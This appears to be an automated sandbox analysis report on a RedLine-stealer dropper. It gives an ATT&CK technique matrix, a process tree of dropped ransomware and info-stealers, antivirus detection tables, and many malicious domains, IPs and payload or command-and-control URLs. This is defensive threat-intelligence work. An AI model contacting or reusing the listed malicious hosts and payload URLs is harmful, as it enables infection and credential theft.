                  Credential Access: OS Credential Dumping (1); Credentials In Files (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: System Time Discovery (12); File and Directory Discovery (3); System Information Discovery (149); Query Registry (1); Security Software Discovery (561); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); System Network Configuration Discovery (1); Network Service Discovery; System Network Connections Discovery; Process Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
                  Collection: Archive Collected Data (1); Email Collection (1); Clipboard Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                  Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (4); Application Layer Protocol (115); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                  Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1496480; Sample: abc0f6a2936703cd32608e7a0c0...; Startdate: 21/08/2024; Architecture: WINDOWS; Score: 100
                  Start
                    DNS/IP: pastebin.com (Connects to a pastebin service (likely for C&C)); hsiens.xyz (Performs DNS queries to domains with low reputation); 11 other IPs or domains
                    Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 26 other signatures
                    abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe 10 (started)
                      Dropped: C:\Users\user\AppData\...\setup_installer.exe, PE32
                      setup_installer.exe 19 (started)
                        Dropped: C:\Users\user\AppData\...\setup_install.exe, PE32; C:\Users\user\AppData\...\libwinpthread-1.dll, PE32; C:\Users\user\AppData\...\libstdc++-6.dll, PE32; 14 other files (13 malicious)
                        Signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        setup_install.exe 1 (started)
                          DNS/IP: 127.0.0.1 unknown unknown
                          Signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender
                          cmd.exe 1 (started)
                            Mon17f45359eb9.exe (started)
                              Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 6 other signatures
                              explorer.exe (injected)
                                DNS/IP: gmpeople.com 188.40.141.211, 59977, 80 HETZNER-ASDE Germany
                                Dropped: C:\Users\user\AppData\Roaming\bgjifes, PE32
                                Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Hides that the sample has been downloaded from the Internet (zone.identifier)
                          cmd.exe 1 (started)
                            Mon17e1fac3fd3d84b.exe (started)
                              Signatures: Machine Learning detection for dropped file
                              mshta.exe (started)
                                cmd.exe (started)
                                  Dropped: C:\Users\user\AppData\Local\Temp\09xU.exE, PE32
                                  09xU.exE (started)
                                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                    mshta.exe (started)
                                    mshta.exe (started)
                                      cmd.exe (started)
                                  conhost.exe (started)
                                  taskkill.exe (started)
                          cmd.exe 1 (started)
                            Mon1785436ae78.exe (started)
                              DNS/IP: 45.9.20.13, 59968, 59980, 59995 DEDIPATH-LLCUS Russian Federation
                              Signatures: Detected unpacking (overwrites its own PE header)
                              WerFault.exe (started, four instances)
                          11 other processes (started)
                            Signatures: Submitted sample is a known malware sample; Adds a directory exclusion to Windows Defender
                            Mon179e1058f256.exe (started)
                              DNS/IP: 135.181.129.119, 4805, 59971, 59974 HETZNER-ASDE Germany
                            Mon17eac6d534bfd22c7.exe 2 (started)
                              Signatures: Injects a PE file into a foreign processes
                              Mon17eac6d534bfd22c7.exe (started)
                                DNS/IP: 45.142.215.47, 27643, 59936, 59950 CLOUDSOLUTIONSRU Russian Federation
                            Mon17948100733a95c58.exe (started)
                              Mon17948100733a95c58.exe (started)
                                WerFault.exe (started)
                            6 other processes (started)
                              DNS/IP: pastebin.com 172.67.19.24, 443, 59963 CLOUDFLARENETUS United States; ip-api.com 208.95.112.1, 49735, 80 TUT-ASUS United States; 6 other IPs or domains
                              Signatures: Contains functionality to steal Chrome passwords or cookies; Opens the same file many times (likely Sandbox evasion); Loading BitLocker PowerShell Module
                              WmiPrvSE.exe (started)
                    svchost.exe (started)

                  Source | Detection | Scanner | Label | Link
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | 71% | ReversingLabs | Win32.Trojan.Redlinestealer |
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | 69% | Virustotal | | Browse
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | 100% | Avira | HEUR/AGEN.1338886 |
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe | 100% | Avira | HEUR/AGEN.1312411 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | 100% | Avira | TR/ATRAPS.Gen |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | 100% | Avira | HEUR/AGEN.1323370 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | 100% | Avira | HEUR/AGEN.1316578 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | 100% | Avira | HEUR/AGEN.1311469 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | 100% | Avira | TR/Redcap.vadxp |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | 100% | Avira | HEUR/AGEN.1316578 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | 100% | Avira | HEUR/AGEN.1316578 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | 100% | Avira | HEUR/AGEN.1305985 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | 100% | Avira | HEUR/AGEN.1318610 |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | 100% | Avira | HEUR/AGEN.1323370 |
                  C:\Users\user\AppData\Local\Temp\09xU.exE | 100% | Avira | TR/Redcap.vadxp |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\09xU.exE | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\09xU.exE | 58% | ReversingLabs | Win32.Adware.RedCap |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | 68% | ReversingLabs | Win32.Trojan.Generic |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe | 92% | ReversingLabs | Win32.Ransomware.StopCrypt |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.SmallDownloader |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe | 81% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe | 81% | ReversingLabs | ByteCode-MSIL.Infostealer.ClipBanker |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe | 84% | ReversingLabs | Win32.Trojan.Tnega |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe | 66% | ReversingLabs | Win32.Trojan.Generic |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | 85% | ReversingLabs | Win64.Backdoor.TurtleLoader |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe | 58% | ReversingLabs | Win32.Adware.RedCap |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe | 88% | ReversingLabs | Win32.Ransomware.StopCrypt |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dll | 13% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll | 18% | ReversingLabs | Win32.Trojan.Generic |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libgcc_s_dw2-1.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libstdc++-6.dll | 47% | ReversingLabs | Win32.Trojan.Redlinestealer |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libwinpthread-1.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | 68% | ReversingLabs | Win32.Trojan.ArkeiStealer |
                  C:\Users\user\AppData\Local\Temp\r6f7sE.I | 74% | ReversingLabs | Win32.Trojan.BunituCrypt |
                  C:\Users\user\AppData\Local\Temp\setup_installer.exe | 68% | ReversingLabs | Win32.Ransomware.StopCrypt |
                  C:\Users\user\AppData\Roaming\bgjifes | 88% | ReversingLabs | Win32.Ransomware.StopCrypt |
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  gmpeople.com | 12% | Virustotal | | Browse
                  cdn.discordapp.com | 1% | Virustotal | | Browse
                  ip-api.com | 0% | Virustotal | | Browse
                  iplogger.org | 0% | Virustotal | | Browse
                  wfsdragon.ru | 9% | Virustotal | | Browse
                  pastebin.com | 0% | Virustotal | | Browse
                  hsiens.xyz | 11% | Virustotal | | Browse
                  t.gogamec.com | 14% | Virustotal | | Browse
                  topniemannpickshop.cc | 13% | Virustotal | | Browse
                  buy-fantasy-football.com.sg | 10% | Virustotal | | Browse
                  all-mobile-pa1ments.com.mx | 11% | Virustotal | | Browse
                  niemannbest.me | 11% | Virustotal | | Browse
                  ggg-cl.biz | 9% | Virustotal | | Browse
                  Source | Detection | Scanner | Label | Link
                  https://aka.ms/odirmr | 0% | URL Reputation | safe |
                  https://aka.ms/odirmr | 0% | URL Reputation | safe |
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
                  https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe |
                  https://g.live.com/odclientsettings/Prod.C: | 0% | URL Reputation | safe |
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                  https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | 0% | URL Reputation | safe |
                  https://wns.windows.com/L | 0% | URL Reputation | safe |
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested | 0% | URL Reputation | safe |
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | URL Reputation | safe |
                  http://tempuri.org/IContract/ExtensionProcessesResponseH9 | 0% | Avira URL Cloud | safe |
                  https://www.rd.com/list/polite-habits-campers-dislike/ | 0% | URL Reputation | safe |
                  https://outlook.com_ | 0% | URL Reputation | safe |
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns | 0% | URL Reputation | safe |
                  http://tempuri.org/IContract/CheckConnectResponse | 0% | Avira URL Cloud | safe |
                  https://gcc.gnu.org/bugs/): | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionLanguagesResponseH9 | 0% | Avira URL Cloud | safe |
                  http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
                  http://lecanardstsornin.com/upload/ | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/ExtensionProcessesResponse | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionSteamFilesResponse | 0% | Avira URL Cloud | safe |
                  https://gcc.gnu.org/bugs/): | 0% | Virustotal | | Browse
                  https://t.gogamec.com/os | 100% | Avira URL Cloud | phishing |
                  https://all-mobile-pa1ments.com.mx/ | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/CheckConnectResponse | 1% | Virustotal | | Browse
                  https://t.gogamec.com/ps | 100% | Avira URL Cloud | malware |
                  http://45.9.20.13/partner/loot.php?pub=mixone75 | 0% | Avira URL Cloud | safe |
                  https://all-mobile-pa1ments.com.mx/ | 11% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionOpenVPNResponse | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionProcessesResponse | 1% | Virustotal | | Browse
                  http://lecanardstsornin.com/upload/ | 12% | Virustotal | | Browse
                  http://tempuri.org/ | 0% | Avira URL Cloud | safe |
                  http://wfsdragon.ru/api/setStats.php | 100% | Avira URL Cloud | phishing |
                  http://tempuri.org/IContract/ExtensionHardwaresLR | 0% | Avira URL Cloud | safe |
                  https://cdn.discorP | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/ | 1% | Virustotal | | Browse
                  http://45.9.20.13/partner/loot.php?pub=mixone8 | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionOpenVPNResponse | 1% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionSteamFilesResponse | 1% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionInstalledBrowsers | 0% | Avira URL Cloud | safe |
                  https://t.gogame.v | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionNordVPNResponseH9 | 0% | Avira URL Cloud | safe |
                  http://wfsdragon.ru/api/setStats.php | 11% | Virustotal | | Browse
                  https://curl.se/ | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionBrowsers | 0% | Avira URL Cloud | safe |
                  http://wfsdragon.ru/ | 0% | Avira URL Cloud | safe |
                  http://45.9.20.13/partner/loot.php?pub=mixone8 | 6% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionSteamFiles | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionHardwaresLR | 1% | Virustotal | | Browse
                  http://45.9.20.13/partner/loot.php?pub=mixone? | 0% | Avira URL Cloud | safe |
                  http://camasirx.com/upload/ | 100% | Avira URL Cloud | phishing |
                  https://t.gogamec.com:443/2302/sqlite.date.dat | 100% | Avira URL Cloud | malware |
                  http://wfsdragon.ru/ | 9% | Virustotal | | Browse
                  https://curl.se/ | 0% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionDiscordLR | 0% | Avira URL Cloud | safe |
                  https://iplogger.org/1a3jd7 | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionBrowsers | 1% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionColdWalletsLR | 0% | Avira URL Cloud | safe |
                  https://niemannbest.me/?username=p11_2 | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/ExtensionDiscordLR | 1% | Virustotal | | Browse
                  https://topniemannpickshop.cc | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionColdWalletsLR | 1% | Virustotal | | Browse
                  https://niemannbest.me/?username=p11_1 | 100% | Avira URL Cloud | malware |
                  https://topniemannpickshop.cc | 14% | Virustotal | | Browse
                  http://tempuri.org/IContract/InitDisplay | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/ExtensionSteamFiles | 1% | Virustotal | | Browse
                  http://tempuri.org/IContract/ConfirmResponse | 0% | Avira URL Cloud | safe |
                  http://camasirx.com/upload/ | 13% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionInstalledBrowsers | 1% | Virustotal | | Browse
                  https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.dat | 100% | Avira URL Cloud | phishing |
                  https://niemannbest.me/?username=p11_1 | 14% | Virustotal | | Browse
                  https://niemannbest.me/?username=p11_2 | 12% | Virustotal | | Browse
                  http://tempuri.org/IContract/InitResponse | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/InitDisplay | 1% | Virustotal | | Browse
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139 | 100% | Avira URL Cloud | phishing |
                  https://iplogger.org/1a3jd7 | 4% | Virustotal | | Browse
                  http://tempuri.org/IContract/ExtensionNordVPN | 0% | Avira URL Cloud | safe |
                  http://tempuri.org/IContract/EnvironmentSettingsLR | 0% | Avira URL Cloud | safe |
                  https://niemannbest.me | 100% | Avira URL Cloud | malware |
                  https://t.gogamec.com//y | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/ConfirmResponse | 1% | Virustotal | | Browse
                  http://tempuri.org/IContract/InitResponse | 1% | Virustotal | | Browse
                  https://niemannbest.me/?username=p11_7 | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/ExtensionScannedFiles | 0% | Avira URL Cloud | safe |
                  https://t.gogamec.com/2302/sqlit.~ | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/ExtensionNordVPN | 1% | Virustotal | | Browse
                  http://staticimg.youtuuee.com/bz | 0% | Avira URL Cloud | safe |
                  https://niemannbest.me/?username=p11_4 | 100% | Avira URL Cloud | malware |
                  http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139 | 14% | Virustotal | | Browse
                  https://niemannbest.me/?username=p11_3 | 100% | Avira URL Cloud | malware |
                  https://niemannbest.me/?username=p11_6 | 100% | Avira URL Cloud | malware |
                  http://tempuri.org/IContract/SetEnvironmentResponse | 0% | Avira URL Cloud | safe |
                  https://niemannbest.me/?username=p11_5 | 100% | Avira URL Cloud | malware |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  gmpeople.com | 188.40.141.211 | true | true | | unknown
                  cdn.discordapp.com | 162.159.130.233 | true | false | | unknown
                  ip-api.com | 208.95.112.1 | true | false | | unknown
                  iplogger.org | 172.67.132.113 | true | false | | unknown
                  wfsdragon.ru | 172.67.133.215 | true | false | | unknown
                  pastebin.com | 172.67.19.24 | true | true | | unknown
                  niemannbest.me | unknown | unknown | true | | unknown
                  all-mobile-pa1ments.com.mx | unknown | unknown | true | | unknown
                  t.gogamec.com | unknown | unknown | true | | unknown
                  ggg-cl.biz | unknown | unknown | true | | unknown
                  buy-fantasy-football.com.sg | unknown | unknown | true | | unknown
                  hsiens.xyz | unknown | unknown | true | | unknown
                  topniemannpickshop.cc | unknown | unknown | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  http://lecanardstsornin.com/upload/ | true | 12%, Virustotal, Browse; Avira URL Cloud: malware | unknown
                  http://camasirx.com/upload/ | true | 13%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
                  https://iplogger.org/1a3jd7 | false | 4%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://aka.ms/odirmrexplorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://gcc.gnu.org/bugs/):setup_install.exe.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionProcessesResponseH9Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/IContract/CheckConnectResponseMon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 
0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/IContract/ExtensionLanguagesResponseH9Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
URL: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • URL Reputation: safe
Reputation: unknown

URL: https://t.gogamec.com/os
Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: phishing
Reputation: unknown

URL: https://all-mobile-pa1ments.com.mx/
Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 11%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown

URL: https://t.gogamec.com/ps
Source: Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: malware
Reputation: unknown

URL: http://45.9.20.13/partner/loot.php?pub=mixone75
Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • Avira URL Cloud: safe
Reputation: unknown
URL: http://tempuri.org/
Source: Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002761000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 1%, Virustotal
  • Avira URL Cloud: safe
Reputation: unknown

URL: http://wfsdragon.ru/api/setStats.php
Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection:
  • 11%, Virustotal
  • Avira URL Cloud: phishing
Reputation: unknown

URL: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
